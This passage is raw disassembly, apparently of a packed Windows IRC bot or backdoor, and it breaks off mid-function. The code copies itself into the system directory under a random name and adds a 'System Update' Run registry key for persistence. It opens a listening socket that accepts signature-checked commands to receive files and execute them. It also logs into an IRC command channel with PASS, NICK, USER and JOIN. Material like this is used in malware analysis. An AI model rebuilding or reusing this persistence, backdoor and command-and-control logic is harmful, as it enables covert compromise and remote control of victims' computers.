sub_31502523 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315025D1 proc near ; CODE XREF: sub_3150269D+D1�p
; sub_3150269D+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_315025E6
push [ebp+arg_0]
call dword_31501098 ; DeleteFileA
loc_315025E6: ; CODE XREF: sub_315025D1+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_31501068 ; GetSystemDirectoryA
test eax, eax
jz locret_3150269B
push esi
call dword_31501124 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31501932
mov esi, dword_3150106C
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset asc_31505CE0 ; "\\"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31501070 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_315010A0 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_31502418
add esp, 14h
push ds:dword_31506154
call dword_315010BC ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31501074 ; WinExec
push 1F4h
call dword_315010A4 ; Sleep
push 0
call dword_315010F0 ; ExitProcess
pop esi
locret_3150269B: ; CODE XREF: sub_315025D1+23�j
leave
retn
sub_315025D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150269D proc near ; CODE XREF: UPX0:31501D57�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31501060 ; GetModuleFileNameA
test eax, eax
jz loc_315027D6
and ds:dword_31506190, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_315023BF
add esp, 14h
test eax, eax
jz short loc_31502723
call dword_31501124 ; rand
push 0Ah
mov ebx, offset aDfashnzdsdl ; "dfashnzdsdl"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31501932
pop ecx
pop ecx
push ebx
call dword_315010A0 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_31502418
add esp, 14h
jmp short loc_31502732
; ---------------------------------------------------------------------------
loc_31502723: ; CODE XREF: sub_3150269D+4D�j
lea eax, [ebp+var_20]
push eax
push offset aDfashnzdsdl ; "dfashnzdsdl"
call dword_31501088 ; lstrcpyA
loc_31502732: ; CODE XREF: sub_3150269D+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_315023BF
add esp, 14h
test eax, eax
jz short loc_31502778
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_31502418
lea eax, [ebp+var_84]
push eax
push 0
call sub_315025D1
add esp, 1Ch
jmp short loc_315027D6
; ---------------------------------------------------------------------------
loc_31502778: ; CODE XREF: sub_3150269D+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_31501064 ; lstrcmpiA
test eax, eax
jnz short loc_315027C1
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_315023BF
add esp, 14h
test eax, eax
jnz short loc_315027D6
push ebx
push edi
push esi
mov ds:dword_31506190, 1
call sub_3150238A
add esp, 0Ch
jmp short loc_315027D6
; ---------------------------------------------------------------------------
loc_315027C1: ; CODE XREF: sub_3150269D+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_315025D1
pop ecx
pop ecx
loc_315027D6: ; CODE XREF: sub_3150269D+1F�j
; sub_3150269D+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_3150269D endp
; =============== S U B R O U T I N E =======================================
sub_315027DB proc near ; CODE XREF: sub_31501B9B+7A�p
; sub_31502889+2A�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_3150105C ; VirtualAlloc
retn
sub_315027DB endp
; =============== S U B R O U T I N E =======================================
sub_315027EF proc near ; CODE XREF: sub_31502889+EB�p
; sub_31502B27+75�p ...
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31501058 ; VirtualFree
retn
sub_315027EF endp
; =============== S U B R O U T I N E =======================================
sub_31502801 proc near ; CODE XREF: sub_31502B27+32�p
push esi
mov esi, ecx
push offset aCont ; "cont"
and dword ptr [esi], 0
lea eax, [esi+4]
push eax
call dword_31501088 ; lstrcpyA
mov eax, esi
pop esi
retn
sub_31502801 endp
; =============== S U B R O U T I N E =======================================
sub_3150281A proc near ; CODE XREF: sub_31502B27+3A�p
push ebx
push ebp
mov ebx, dword_31501018
push esi
push edi
xor ebp, ebp
mov edi, ecx
push ebp
push 1
push ebp
lea esi, [edi+0Eh]
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_31502849
push 8
push 1
push ebp
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_31502849
push 1
pop eax
jmp short loc_31502869
; ---------------------------------------------------------------------------
loc_31502849: ; CODE XREF: sub_3150281A+1B�j
; sub_3150281A+28�j
add edi, 12h
push edi
push ebp
push ebp
push 114h
push offset dword_31505CE8
push dword ptr [esi]
call dword_3150101C ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_31502869: ; CODE XREF: sub_3150281A+2D�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_3150281A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150286E proc near ; CODE XREF: sub_31502B27+7E�p
push esi
mov esi, ecx
push dword ptr [esi+12h]
call dword_31501010 ; CryptDestroyKey
push 0
push dword ptr [esi+0Eh]
call dword_31501014 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3150286E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502889 proc near ; CODE XREF: sub_31502B27+46�p
var_28 = byte ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
mov [ebp+var_8], ecx
push eax
call dword_31501050 ; GetSystemTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_28]
push eax
call dword_31501054 ; SystemTimeToFileTime
mov esi, 4000h
push esi
call sub_315027DB
mov ebx, [ebp+arg_0]
pop ecx
mov edi, eax
push 0
push esi
push edi
push dword ptr [ebx]
call dword_315011A0 ; recv
lea esi, [edi+8]
push 8
lea eax, [ebp+var_10]
push esi
push eax
call sub_31503A1E ; memcpy
mov ecx, [ebp+var_10]
mov eax, [ebp+var_C]
add esp, 0Ch
sub ecx, [ebp+var_18]
sbb eax, [ebp+var_14]
cmp eax, 8
jg short loc_3150296A
jl short loc_315028F7
cmp ecx, 61C46800h
ja short loc_3150296A
loc_315028F7: ; CODE XREF: sub_31502889+64�j
cmp eax, 0FFFFFFF7h
jl short loc_3150296A
jg short loc_31502906
cmp ecx, 9E3B9800h
jb short loc_3150296A
loc_31502906: ; CODE XREF: sub_31502889+73�j
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_8]
push 0
push 0
push 8003h
push dword ptr [eax+0Eh]
call dword_31501000 ; CryptCreateHash
test eax, eax
jz short loc_3150295B
push 0
push 8
push esi
push [ebp+var_4]
call dword_31501004 ; CryptHashData
test eax, eax
jz short loc_3150295B
mov eax, [edi+10h]
cmp eax, 2800h
ja short loc_3150295B
mov ecx, [ebp+var_8]
xor esi, esi
push esi
push esi
push dword ptr [ecx+12h]
push eax
lea eax, [edi+14h]
push eax
push [ebp+var_4]
call dword_31501008 ; CryptVerifySignatureA
test eax, eax
jnz short loc_31502983
loc_3150295B: ; CODE XREF: sub_31502889+98�j
; sub_31502889+AA�j ...
call dword_3150109C ; RtlGetLastWin32Error
push [ebp+var_4]
call dword_3150100C ; CryptDestroyHash
loc_3150296A: ; CODE XREF: sub_31502889+62�j
; sub_31502889+6C�j ...
call dword_3150109C ; RtlGetLastWin32Error
push 2
pop esi
loc_31502973: ; CODE XREF: sub_31502889+117�j
push edi
call sub_315027EF
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31502983: ; CODE XREF: sub_31502889+D0�j
push [ebp+var_4]
call dword_3150100C ; CryptDestroyHash
call dword_31501124 ; rand
push esi
push 4
push edi
mov [edi], eax
push dword ptr [ebx]
call dword_3150119C ; send
jmp short loc_31502973
sub_31502889 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315029A2 proc near ; CODE XREF: sub_31502B27+6A�p
var_220 = byte ptr -220h
var_118 = byte ptr -118h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 220h
cmp [ebp+arg_8], 8
push ebx
push esi
push edi
jge short loc_315029C1
push 0
push [ebp+arg_8]
push [ebp+arg_4]
jmp loc_31502B19
; ---------------------------------------------------------------------------
loc_315029C1: ; CODE XREF: sub_315029A2+10�j
mov esi, [ebp+arg_4]
mov ebx, 104h
mov eax, [esi]
lea edi, [esi+8]
test eax, eax
mov [ebp+arg_4], eax
jnz loc_31502AD2
lea eax, [ebp+var_220]
push ebx
push eax
call dword_31501068 ; GetSystemDirectoryA
lea eax, [ebp+var_220]
push eax
call dword_31501048 ; SetCurrentDirectoryA
mov eax, [edi]
push ebx
mov [ebp+arg_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
lea eax, [edi+8]
push eax
lea eax, [ebp+var_118]
push eax
call dword_315010A8 ; lstrcpynA
xor eax, eax
push eax
push eax
push 2
push eax
push eax
lea eax, [ebp+var_118]
push 40000000h
push eax
call dword_315010EC ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_31502AC0
mov ebx, dword_3150119C
push 0
push 8
push esi
push [ebp+arg_0]
mov dword ptr [esi+4], 1
call ebx ; send
mov eax, [ebp+arg_8]
xor edx, edx
div [ebp+var_4]
xor edx, edx
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
div [ebp+var_4]
test edx, edx
jz short loc_31502A68
inc [ebp+arg_4]
loc_31502A68: ; CODE XREF: sub_315029A2+C1�j
and [ebp+var_8], 0
cmp [ebp+arg_4], 0
jle short loc_31502AB5
loc_31502A72: ; CODE XREF: sub_315029A2+111�j
push 0
push [ebp+var_4]
push edi
push [ebp+arg_0]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [ebp+arg_8], eax
jz short loc_31502AB5
lea ecx, [ebp+var_10]
push 0
push ecx
push eax
push edi
push [ebp+var_C]
call dword_3150104C ; WriteFile
mov eax, [ebp+arg_8]
push 0
push 8
push esi
push [ebp+arg_0]
mov [esi+4], eax
call ebx ; send
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jl short loc_31502A72
loc_31502AB5: ; CODE XREF: sub_315029A2+CE�j
; sub_315029A2+E5�j
push [ebp+var_C]
call dword_315010BC ; CloseHandle
jmp short loc_31502B22
; ---------------------------------------------------------------------------
loc_31502AC0: ; CODE XREF: sub_315029A2+8F�j
and dword ptr [esi+4], 0
push 0
push 8
push esi
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502AD2: ; CODE XREF: sub_315029A2+31�j
cmp [ebp+arg_4], 1
jnz short loc_31502B01
lea eax, [ebp+var_118]
push ebx
push eax
call dword_31501068 ; GetSystemDirectoryA
lea eax, [ebp+var_118]
push eax
call dword_31501048 ; SetCurrentDirectoryA
push 0
push 4
push esi
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502B01: ; CODE XREF: sub_315029A2+134�j
cmp [ebp+arg_4], 3
jnz short loc_31502B22
push dword ptr [edi]
add edi, 4
push edi
call sub_31501962
pop ecx
pop ecx
push 0
push 4
push esi
loc_31502B19: ; CODE XREF: sub_315029A2+1A�j
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502B22: ; CODE XREF: sub_315029A2+11C�j
; sub_315029A2+163�j
pop edi
pop esi
pop ebx
leave
retn
sub_315029A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502B27 proc near ; DATA XREF: sub_31502BC3+AA�o
var_30 = dword ptr -30h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
call sub_315018BA
mov esi, [ebp+arg_0]
push 6
pop ecx
lea edi, [ebp+var_30]
rep movsd
push [ebp+var_1C]
call dword_315010D8 ; SetEvent
mov esi, 10000h
push esi
call sub_315027DB
pop ecx
mov edi, eax
lea ecx, [ebp+var_18]
call sub_31502801
lea ecx, [ebp+var_18]
call sub_3150281A
lea eax, [ebp+var_30]
lea ecx, [ebp+var_18]
push eax
call sub_31502889
test eax, eax
jnz short loc_31502B9B
loc_31502B76: ; CODE XREF: sub_31502B27+72�j
push 0
push esi
push edi
push [ebp+var_30]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_31502B9B
test eax, eax
jz short loc_31502B9B
push eax
push edi
push [ebp+var_30]
call sub_315029A2
add esp, 0Ch
jmp short loc_31502B76
; ---------------------------------------------------------------------------
loc_31502B9B: ; CODE XREF: sub_31502B27+4D�j
; sub_31502B27+5F�j ...
push edi
call sub_315027EF
pop ecx
lea ecx, [ebp+var_18]
call sub_3150286E
push [ebp+var_30]
call dword_315011A8 ; closesocket
push 0
call dword_315010E0 ; ExitThread
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_31502B27 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_31502BC3 proc near ; DATA XREF: sub_31501D89+13E�o
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_3150118C ; socket
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_31503A12 ; memset
add esp, 0Ch
mov [ebp+var_1C], 2
mov [ebp+var_18], esi
loc_31502BF4: ; CODE XREF: sub_31502BC3+59�j
lea eax, [esi+0BFBh]
push eax
call dword_31501194 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_1C]
push 10h
push eax
push [ebp+var_4]
call dword_31501170 ; bind
test eax, eax
jz short loc_31502C1E
inc esi
cmp esi, 0Ah
jl short loc_31502BF4
loc_31502C1E: ; CODE XREF: sub_31502BC3+53�j
push 32h
push [ebp+var_4]
call dword_31501174 ; listen
mov ebx, dword_315010BC
loc_31502C2F: ; CODE XREF: sub_31502BC3+CD�j
lea eax, [ebp+var_8]
mov [ebp+var_8], 10h
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+var_4]
call dword_31501178 ; accept
lea esi, [ebp+var_2C]
lea edi, [ebp+var_40]
mov [ebp+var_44], eax
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push 1
push esi
call dword_31501090 ; CreateEventA
mov [ebp+var_30], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_44]
push esi
push eax
push offset sub_31502B27
push esi
push esi
call dword_315010D0 ; CreateThread
push eax
call ebx ; CloseHandle
push 3E8h
push [ebp+var_30]
call dword_31501094 ; WaitForSingleObject
push [ebp+var_30]
call ebx ; CloseHandle
jmp short loc_31502C2F
sub_31502BC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502C92 proc near ; CODE XREF: sub_31502D17+25�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31502CC5
add ebx, 1Ah
loc_31502CC5: ; CODE XREF: sub_31502C92+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31501110
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31502CEF
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31502D12
; ---------------------------------------------------------------------------
loc_31502CEF: ; CODE XREF: sub_31502C92+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31502D0F
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31502D12
; ---------------------------------------------------------------------------
loc_31502D0F: ; CODE XREF: sub_31502C92+68�j
mov al, [ebp+arg_0]
loc_31502D12: ; CODE XREF: sub_31502C92+5B�j
; sub_31502C92+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31502C92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502D17 proc near ; CODE XREF: sub_315036FD+F7�p
; sub_315036FD+137�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_31502D72
mov edi, [ebp+arg_0]
push ebx
loc_31502D2C: ; CODE XREF: sub_31502D17+56�j
mov bl, al
inc [ebp+arg_4]
mov eax, esi
mov byte ptr [ebp+arg_0], bl
neg eax
push eax
push [ebp+arg_0]
call sub_31502C92
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_31502D56
cmp bl, 7Ah
jg short loc_31502D56
movsx esi, bl
sub esi, 61h
loc_31502D56: ; CODE XREF: sub_31502D17+32�j
; sub_31502D17+37�j
cmp bl, 41h
jl short loc_31502D66
cmp bl, 5Ah
jg short loc_31502D66
movsx esi, bl
sub esi, 41h
loc_31502D66: ; CODE XREF: sub_31502D17+42�j
; sub_31502D17+47�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_31502D2C
pop ebx
jmp short loc_31502D75
; ---------------------------------------------------------------------------
loc_31502D72: ; CODE XREF: sub_31502D17+F�j
mov edi, [ebp+arg_0]
loc_31502D75: ; CODE XREF: sub_31502D17+59�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31502D17 endp
; =============== S U B R O U T I N E =======================================
sub_31502D7C proc near ; CODE XREF: UPX0:31503449�p
push esi
mov esi, ecx
push 20001h
call sub_315027DB
mov [esi+2Ch], eax
pop ecx
mov eax, esi
pop esi
retn
sub_31502D7C endp
; =============== S U B R O U T I N E =======================================
sub_31502D91 proc near ; CODE XREF: UPX0:315034A9�p
; UPX0:315034FC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push 27h
push [esp+8+arg_0]
lea eax, [esi+4]
push eax
call dword_315010A8 ; lstrcpynA
mov eax, [esp+4+arg_4]
mov [esi+58h], eax
pop esi
retn 8
sub_31502D91 endp
; ---------------------------------------------------------------------------
loc_31502DAF: ; CODE XREF: UPX0:31503AB6�j
push esi
mov esi, ecx
lea eax, [esi+4]
push eax
call sub_315027EF
push dword ptr [esi+2Ch]
call sub_315027EF
pop ecx
pop ecx
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_31502DC7 proc near ; CODE XREF: UPX0:315034C7�p
; UPX0:3150351A�p
var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 138h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
push ebx
push 1
mov esi, ecx
push 2
call dword_3150118C ; socket
mov [esi+5Ch], eax
lea eax, [esi+4]
push eax
call sub_315019B8
mov [esi+64h], eax
mov ax, [esi+58h]
pop ecx
lea edi, [esi+60h]
push eax
mov word ptr [edi], 2
call dword_31501194 ; ntohs
push 10h
push edi
push dword ptr [esi+5Ch]
mov [esi+62h], ax
call dword_31501198 ; connect
test eax, eax
jnz loc_31502FCC
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FCC
mov ecx, [esi+2Ch]
and [ecx+eax], bl
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503009
lea eax, [esp+148h+var_138]
push 9
push eax
call sub_31501932
mov ebp, dword_3150113C
lea eax, [esp+150h+var_138]
push eax
lea eax, [esp+154h+var_12C]
push offset aPassS ; "PASS %s\r\n"
push eax
call ebp ; wsprintfA
mov edi, dword_315010A4
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push ebx
mov ebx, dword_315010A0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push [esp+148h+arg_0]
lea eax, [esp+14Ch+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FCC
mov ecx, [esi+2Ch]
push 64h
and byte ptr [ecx+eax], 0
call edi ; Sleep
loc_31502EF0: ; CODE XREF: sub_31502DC7+1AD�j
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503009
push offset aAlready ; "already"
push dword ptr [esi+2Ch]
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31502F79
push [esp+148h+arg_4]
push [esp+14Ch+arg_0]
call sub_31501932
push [esp+150h+arg_0]
lea eax, [esp+154h+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31502FCC
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
jmp loc_31502EF0
; ---------------------------------------------------------------------------
loc_31502F79: ; CODE XREF: sub_31502DC7+145�j
push [esp+148h+arg_8]
lea eax, [esp+14Ch+var_12C]
push [esp+14Ch+arg_0]
push offset aUserS8S ; "USER %s 8 * :%s\r\n"
push eax
call ebp ; wsprintfA
add esp, 10h
push 64h
call edi ; Sleep
xor edi, edi
lea eax, [esp+148h+var_12C]
push edi
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push edi
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_31502FDA
loc_31502FCC: ; CODE XREF: sub_31502DC7+4E�j
; sub_31502DC7+6B�j ...
push dword ptr [esi+5Ch]
call dword_315011A8 ; closesocket
push 1
pop eax
jmp short loc_31502FFC
; ---------------------------------------------------------------------------
loc_31502FDA: ; CODE XREF: sub_31502DC7+203�j
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503009
mov [esi+284h], edi
mov [esi+7Ch], edi
mov [esi+70h], edi
mov [esi+74h], edi
xor eax, eax
loc_31502FFC: ; CODE XREF: sub_31502DC7+211�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 138h
retn 0Ch
sub_31502DC7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503009 proc near ; CODE XREF: sub_31502DC7+7C�p
; sub_31502DC7+12E�p ...
var_190 = byte ptr -190h
var_64 = byte ptr -64h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
push ebx
push esi
push edi
push offset aPing ; "PING"
push [ebp+arg_0]
mov ebx, ecx
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503083
mov esi, dword_315010A0
lea edi, [eax+4]
push edi
call esi ; lstrlenA
dec eax
cmp eax, 63h
jle short loc_31503042
push 1
pop eax
jmp short loc_31503085
; ---------------------------------------------------------------------------
loc_31503042: ; CODE XREF: sub_31503009+32�j
push eax
lea eax, [ebp+var_64]
push edi
push eax
call dword_315010A8 ; lstrcpynA
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_190]
push offset aPongS ; "PONG%s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_190]
push 0
push eax
call esi ; lstrlenA
push eax
lea eax, [ebp+var_190]
push eax
push dword ptr [ebx+5Ch]
call dword_3150119C ; send
loc_31503083: ; CODE XREF: sub_31503009+20�j
xor eax, eax
loc_31503085: ; CODE XREF: sub_31503009+37�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31503009 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150308C proc near ; CODE XREF: UPX0:31503568�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 12Ch
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12C]
mov esi, ecx
push offset aJoinS ; "JOIN %s\r\n"
push eax
call dword_3150113C ; wsprintfA
mov edi, dword_315010A4
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 64h
call edi ; Sleep
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
mov ecx, [esi+2Ch]
mov [esi], eax
and byte ptr [ecx+eax], 0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_31503155
test eax, eax
jz short loc_31503155
push 64h
call edi ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503009
mov edi, dword_31501120
push offset a451 ; "451"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3150312E
push 3
jmp short loc_31503157
; ---------------------------------------------------------------------------
loc_3150312E: ; CODE XREF: sub_3150308C+9C�j
push offset aPing ; "PING"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503142
push 4
jmp short loc_31503157
; ---------------------------------------------------------------------------
loc_31503142: ; CODE XREF: sub_3150308C+B0�j
push 23h
add esi, 30h
push [ebp+arg_0]
push esi
call dword_315010A8 ; lstrcpynA
xor eax, eax
jmp short loc_31503158
; ---------------------------------------------------------------------------
loc_31503155: ; CODE XREF: sub_3150308C+74�j
; sub_3150308C+78�j
push 2
loc_31503157: ; CODE XREF: sub_3150308C+A0�j
; sub_3150308C+B4�j
pop eax
loc_31503158: ; CODE XREF: sub_3150308C+C7�j
pop edi
pop esi
leave
retn 4
sub_3150308C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150315E proc near ; CODE XREF: sub_315031C7+83�p
; UPX0:315035C4�p
var_14C = byte ptr -14Ch
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 14Ch
push esi
mov esi, ecx
call dword_31501124 ; rand
sub eax, 3
and eax, 7
push eax
lea eax, [ebp+var_20]
push eax
call sub_31501932
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14C]
push offset aQuitS ; "QUIT %s\r\n"
push eax
